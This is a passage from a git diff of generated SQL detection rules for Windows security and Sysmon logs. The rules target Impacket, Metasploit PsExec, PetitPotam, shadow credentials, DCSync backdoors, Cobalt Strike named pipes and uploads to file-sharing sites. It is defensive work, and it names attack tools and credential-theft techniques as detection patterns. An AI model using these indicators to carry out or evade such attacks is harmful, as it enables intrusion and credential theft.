'%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' 
AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Linux hostnames composed of 16 characters." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "Unknown" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. 
(From elastic FP section)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND 
NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Unknown" + "Unknown. Feedback welcomed." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE 
'%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", - "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion 
was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Intended inclusions by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "falsepositives": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if 
it's a regular user or DC computer account." + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + ], + "filename": "win_security_account_backdoor_dcsync_rights.yml" + }, + { + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Possible FP during log rotation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] 
diff --git a/rules/rules_windows_sysmon_medium.json b/rules/rules_windows_sysmon_medium.json index 6eb95de..940c059 100644 --- a/rules/rules_windows_sysmon_medium.json +++ b/rules/rules_windows_sysmon_medium.json 
@@ -1,795 +1,730 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName 
LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR 
PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE 
'\\'))" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "PAExec Default Named Pipe", + "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "description": "Detects PAExec default named pipe", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PAExec%' ESCAPE '\\')" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_paexec_default_pipe.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "status": "test", - "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE 
'\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Addition of SID History to Active Directory Object", - "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", - "status": "stable", - "description": "An attacker can use the SID history attribute to gain additional privileges.", - "author": "Thomas Patzke, @atc_project (improvements)", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "status": "test", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1134.005" + "attack.t1055" ], "falsepositives": [ - "Migration of an account into a new domain" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR 